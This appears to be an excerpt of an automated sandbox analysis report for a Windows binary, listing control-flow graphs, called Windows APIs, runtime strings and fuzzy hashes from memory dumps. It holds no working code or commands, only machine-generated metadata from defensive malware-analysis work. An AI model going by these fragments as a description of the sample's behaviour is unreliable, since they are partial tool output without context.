                • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer
                • API String ID: 3114109732-4016646221
                • Opcode ID: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
                • Instruction ID: c7be5991b9c45a3a7d07a6555b46c7948675e4dd25aa1471be36ed1741c4cc4a
                • Opcode Fuzzy Hash: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
                • Instruction Fuzzy Hash: 9C51AD32615B558AEF10EBA0E8803AD33B5F7047A8F948576EE4DA7B54DF78C48AC340

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1189 b71956-b7196d 1190 b71973-b71983 TlsGetValue 1189->1190 1191 b71ae8-b71af4 call b7c7f0 1189->1191 1193 b71989 1190->1193 1194 b71ad8-b71ae7 1190->1194 1202 b71afb-b71b56 call b69650 1191->1202 1196 b71ad5 1193->1196 1197 b7198f-b71992 1193->1197 1196->1194 1198 b719a4-b719b6 call b73d17 1197->1198 1199 b71994-b7199e 1197->1199 1203 b719bb-b719be 1198->1203 1199->1198 1200 b71a9a-b71ac9 call b70e1a TlsGetValue TlsSetValue 1199->1200 1200->1194 1210 b71acb-b71ad3 call b70de2 1200->1210 1203->1202 1206 b719c4-b71a92 call b70e49 call b70e1a memset 1203->1206 1206->1200 1210->1194
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: Value$memset
                • String ID:
                • API String ID: 3732838118-0
                • Opcode ID: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
                • Instruction ID: 8295455a4bb0fedbb978da80c863cb495dfd555e00ce4a038e422ce50f1e9610
                • Opcode Fuzzy Hash: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
                • Instruction Fuzzy Hash: E6518E32609BC492E7298F28E6413E9A3E0FB99784F149611DFAC17725EF38D6A5C340

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1269 b9ec40-b9ec5a 1270 b9eeed-b9eef4 call b6ad10 1269->1270 1271 b9ec60-b9ec99 1269->1271 1273 b9eef9-b9ef08 call b69690 1270->1273 1271->1273 1274 b9ec9f-b9ecad 1271->1274 1282 b9ef20-b9ef2f call ba28b0 1273->1282 1276 b9ecb0-b9ecb3 1274->1276 1277 b9ed0a-b9ed3c 1276->1277 1278 b9ecb5-b9ecc2 1276->1278 1281 b9ed40-b9ed4c 1277->1281 1278->1276 1280 b9ecc4-b9ecca 1278->1280 1283 b9ecd0-b9ecd7 1280->1283 1284 b9edd2-b9ee04 call b69650 1280->1284 1285 b9ed8b-b9ed8e 1281->1285 1286 b9ed4e-b9ed89 1281->1286 1289 b9ee09-b9ee13 call b9e930 1283->1289 1290 b9ecdd-b9ece6 1283->1290 1284->1282 1291 b9ef0a-b9ef1b call b6a0a0 1285->1291 1292 b9ed94-b9ed9c 1285->1292 1286->1281 1286->1285 1300 b9ee18-b9ee3d 1289->1300 1295 b9ee6c-b9ee7d call b9ef30 1290->1295 1296 b9ecec-b9ed05 memcpy 1290->1296 1291->1282 1297 b9eda0-b9eda6 1292->1297 1301 b9ee7f-b9ee82 call b7c2e0 1295->1301 1315 b9eed8-b9eeec 1295->1315 1296->1301 1303 b9edac-b9edbd 1297->1303 1304 b9ee44-b9ee4b 1297->1304 1305 b9ee8c-b9ee9d 1300->1305 1306 b9ee3f 1300->1306 1317 b9ee87-b9ee8a 1301->1317 1303->1297 1310 b9edbf-b9edcc 1303->1310 1307 b9ee4d-b9ee57 1304->1307 1308 b9eebc 1304->1308 1312 b9eeca-b9eed3 call b9ef30 1305->1312 1313 b9ee9f-b9eeba memcpy 1305->1313 1306->1315 1314 b9eebf-b9eec8 1307->1314 1316 b9ee59-b9ee64 call b7c2e0 1307->1316 1308->1314 1310->1283 1310->1284 1312->1315 1313->1315 1314->1312 1314->1313 1316->1315 1321 b9ee66-b9ee6a 1316->1321 1317->1305 1317->1315 1321->1314
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
                • Instruction ID: 8b2123ea8f893e6e0e71da4aa700e99ed3296cd90a861ae63f8757ba3c5812e9
                • Opcode Fuzzy Hash: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
                • Instruction Fuzzy Hash: 4E611463711A9492DE20DF2299043AD7BE1FB1ABE4F848A75DE6E17B94DB3CD185C300

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1338 b7c2e0-b7c2fc 1339 b7c302-b7c32a 1338->1339 1340 b7c45b-b7c45d 1338->1340 1342 b7c34d-b7c366 call b7b6f0 1339->1342 1341 b7c49d-b7c4ad 1340->1341 1344 b7c36b-b7c38c 1342->1344 1345 b7c400-b7c403 1344->1345 1346 b7c38e-b7c398 1344->1346 1347 b7c405-b7c408 1345->1347 1348 b7c45f-b7c469 1345->1348 1346->1345 1347->1342 1353 b7c437-b7c43a 1347->1353 1348->1341 1350 b7c46b-b7c475 1348->1350 1351 b7c477-b7c47f 1350->1351 1352 b7c4ae-b7c4c5 call b6a0a0 1350->1352 1351->1341 1355 b7c481-b7c496 memcpy 1351->1355 1360 b7c4c7-b7c4ce call b68a20 1352->1360 1361 b7c4d3-b7c4ff call b68a20 call b7c500 call ba28b0 call b6b900 1352->1361 1353->1340 1354 b7c43c-b7c447 1353->1354 1358 b7c499 1354->1358 1359 b7c449-b7c456 call b6a0a0 1354->1359 1355->1358 1358->1341 1359->1340 1360->1361
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
                • Instruction ID: f65d6cd676d0ba349eda84a48e0006e32de2668fd46f3499417b57a6adb4dc6d
                • Opcode Fuzzy Hash: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
                • Instruction Fuzzy Hash: D4317B6230464482DE25DF26AA5937AABE1FB41BD4F54C86E9E3E0BB54CF3CC445C300

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1373 b7c40d-b7c427 1374 b7c340-b7c347 1373->1374 1375 b7c42d-b7c433 1373->1375 1378 b7c437-b7c43a 1374->1378 1379 b7c34d-b7c366 call b7b6f0 1374->1379 1376 b7c435 1375->1376 1377 b7c46b-b7c475 1375->1377 1376->1377 1382 b7c49d-b7c4ad 1376->1382 1383 b7c477-b7c47f 1377->1383 1384 b7c4ae-b7c4c5 call b6a0a0 1377->1384 1380 b7c43c-b7c447 1378->1380 1381 b7c45b-b7c45d 1378->1381 1389 b7c36b-b7c38c 1379->1389 1386 b7c499 1380->1386 1387 b7c449-b7c456 call b6a0a0 1380->1387 1381->1382 1383->1382 1388 b7c481-b7c496 memcpy 1383->1388 1395 b7c4c7-b7c4ce call b68a20 1384->1395 1396 b7c4d3-b7c4ff call b68a20 call b7c500 call ba28b0 call b6b900 1384->1396 1386->1382 1387->1381 1388->1386 1393 b7c400-b7c403 1389->1393 1394 b7c38e-b7c398 1389->1394 1397 b7c405-b7c408 1393->1397 1398 b7c45f-b7c469 1393->1398 1394->1393 1395->1396 1397->1374 1398->1377 1398->1382
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
                • Instruction ID: d4b12e7eb40c597b6ed9804984d072a38b0d537f906c46c2ba193b872bb1ead5
                • Opcode Fuzzy Hash: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
                • Instruction Fuzzy Hash: 3011086330175443CD258B2AAA5933ADAD5EB01BE8F4489698F7E07FD4C77CC5818204

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1409 b63444-b63463 1410 b63465-b63487 memcpy 1409->1410 1411 b63488-b63491 call ba2145 1409->1411 1413 b63496-b6349a 1411->1413 1413->1410
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: f6585f0aeca96471679dd929d5b489702fc140ae0c9539dee33da2eeea6da2ac
                • Instruction ID: f7535b28e15813015ab232b8cb86fd0173dcc7cfb803659ae19feea748e0cfc0
                • Opcode Fuzzy Hash: f6585f0aeca96471679dd929d5b489702fc140ae0c9539dee33da2eeea6da2ac
                • Instruction Fuzzy Hash: 3FE0229270465493AC088F2B9E4004C9BA1BB0AFD039488A1DF0C6BF11CF38C5E39300
                APIs
                • RtlCaptureContext.KERNEL32 ref: 00BA2E24
                • RtlLookupFunctionEntry.KERNEL32 ref: 00BA2E3B
                • RtlVirtualUnwind.KERNEL32 ref: 00BA2E7D
                • SetUnhandledExceptionFilter.KERNEL32 ref: 00BA2EC1
                • UnhandledExceptionFilter.KERNEL32 ref: 00BA2ECE
                • GetCurrentProcess.KERNEL32 ref: 00BA2ED4
                • TerminateProcess.KERNEL32 ref: 00BA2EE2
                • abort.MSVCRT ref: 00BA2EE8
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                • String ID:
                • API String ID: 4278921479-0
                • Opcode ID: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
                • Instruction ID: 8643e508a7dc927ba6b41a01933403c57f498dd170b7e379acef29de14f3e748
                • Opcode Fuzzy Hash: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
                • Instruction Fuzzy Hash: 8F211035A11F04AAFB109F69F88438933A8F70AB84F800226DA8E53724EFB8C255C350
                APIs
                Strings
                • NTDLL.DLL, xrefs: 00B7D4FF
                • assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs, xrefs: 00B7DA0C
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: FormatMessagememcpymemset
                • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs
                • API String ID: 2872659494-3982518490
                • Opcode ID: 643585feb79c3478ee28cd302294b6c35d0262f3dffedde0363ea64798463dc3
                • Instruction ID: c338f0bfc54bfba622d497614d16a4846f1976f9fbc28c40cd385e3facb7d89c
                • Opcode Fuzzy Hash: 643585feb79c3478ee28cd302294b6c35d0262f3dffedde0363ea64798463dc3
                • Instruction Fuzzy Hash: 46D1CC32215AC289EB358F25D9407FD2BA1FB457C8F848176DA6E0BF89DF788245E340
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: a39c0183ff7b056c203547cf7bddd3618d377d9b3e928647f0fc6173ce18ed73
                • Instruction ID: 8ed71f468362464181e210acded564a111f869befcc316b030502c4ea9a378a0
                • Opcode Fuzzy Hash: a39c0183ff7b056c203547cf7bddd3618d377d9b3e928647f0fc6173ce18ed73
                • Instruction Fuzzy Hash: 1C919962305B909AEB48EF66A8403AD77E4F709B88F48856AEF9D57B55DF34D4A0C300
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ErrorLast$FullNamePath
                • String ID: \\?\\\?\UNC\$appdata
                • API String ID: 2482867836-3357109634
                • Opcode ID: db9139a5b54f316676feeaf5c6dd963c510de4c2574a4cc0f1f758acdbbabd93
                • Instruction ID: 796c0839ed712cc9057004085d90a358e9128ddcffa2f3672ac5b296a64a0081
                • Opcode Fuzzy Hash: db9139a5b54f316676feeaf5c6dd963c510de4c2574a4cc0f1f758acdbbabd93
                • Instruction Fuzzy Hash: 85C1BD62600BD486CF359F65D4983B93BE8F305BD8F9085A6EE595B799DF38CA81C300
                APIs
                • RaiseException.KERNEL32 ref: 00BA2703
                • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00B7A71B), ref: 00BA2709
                • RtlUnwindEx.KERNEL32 ref: 00BA2818
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ExceptionRaiseUnwindabort
                • String ID: CCG $CCG!$CCG!$CCG"
                • API String ID: 4140830120-3707373406
                • Opcode ID: 34dc56733007f9fd3c55d28220b4e5370bce957e66330a88e271d286e1120c74
                • Instruction ID: 3ede87d67d2f83ddeb2c6c40e174e276a71f9baa8b0cf53b7dfb425ef3b5a5fc
                • Opcode Fuzzy Hash: 34dc56733007f9fd3c55d28220b4e5370bce957e66330a88e271d286e1120c74
                • Instruction Fuzzy Hash: 0B516976219B80C6C7208F59E8807AE73B5F38AB98F644116EF8E43B18CF39C991C740
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: Value
                • String ID:
                • API String ID: 3702945584-0
                • Opcode ID: 7851064097a3cfe09f52e595153435b02b94279ce94f90271a7570efdee0cb97
                • Instruction ID: c6e432e434c517f9f2c3a46247330212149346c0656f8c6f0eb266e830dc68c1
                • Opcode Fuzzy Hash: 7851064097a3cfe09f52e595153435b02b94279ce94f90271a7570efdee0cb97
                • Instruction Fuzzy Hash: 5D519222706A948BDB2A9F26565137D6BE1EB46F80F0DD0ADDF2E17345DB38DC818384
                APIs
                Strings
                • Address %p has no image-section, xrefs: 00BA3160
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00BA335B
                • Mingw-w64 runtime failure:, xrefs: 00BA3128
                • VirtualProtect failed with code 0x%x, xrefs: 00BA32F6
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                • API String ID: 1804819252-1534286854
                • Opcode ID: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
                • Instruction ID: 27a45e3b930b4e9947255059ccf012e3993e4c63198c7c96527a8662c8817d95
                • Opcode Fuzzy Hash: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
                • Instruction Fuzzy Hash: 8051E072705B4096DB108F59F884799B7E0FB9AFA4F588225FFA903390EB78C685C300
                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B7FE45), ref: 00B9C236
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B7FE45), ref: 00B9C251
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B7FE45), ref: 00B9C264
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ErrorLast$CloseHandle
                • String ID:
                • API String ID: 3463825546-0
                • Opcode ID: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
                • Instruction ID: dd64c09dac92c18355acaf46389804fc113f2828338dc8ed737e76fb06be7510
                • Opcode Fuzzy Hash: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
                • Instruction Fuzzy Hash: 4C5148627042A097FF25876596503AE2FE0F3497D4F1442B1CF8A57BC6DB78C8A5C304
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: CloseHandle$File$CreateMappingView
                • String ID:
                • API String ID: 1771758222-0
                • Opcode ID: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
                • Instruction ID: 9c86c1160839b1fe0a3b058857370b6aa293b57b6c0a8788ca5dda62a2247c18
                • Opcode Fuzzy Hash: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
                • Instruction Fuzzy Hash: 7851CA22715B5185EB24DB66E46876E27E0FB8AB88F18C069DF5D0BB46DF3CC486C304
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: signal
                • String ID: CCG
                • API String ID: 1946981877-1584390748
                • Opcode ID: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
                • Instruction ID: 431169df27b6bcddf8961a5413b4daf6f3559d6736849da0781969a8525ec035
                • Opcode Fuzzy Hash: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
                • Instruction Fuzzy Hash: 9E219F6170C54046EB2852A9949233E24C1DB8BB74F294B96F57E833E4DBAACEC5C302
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
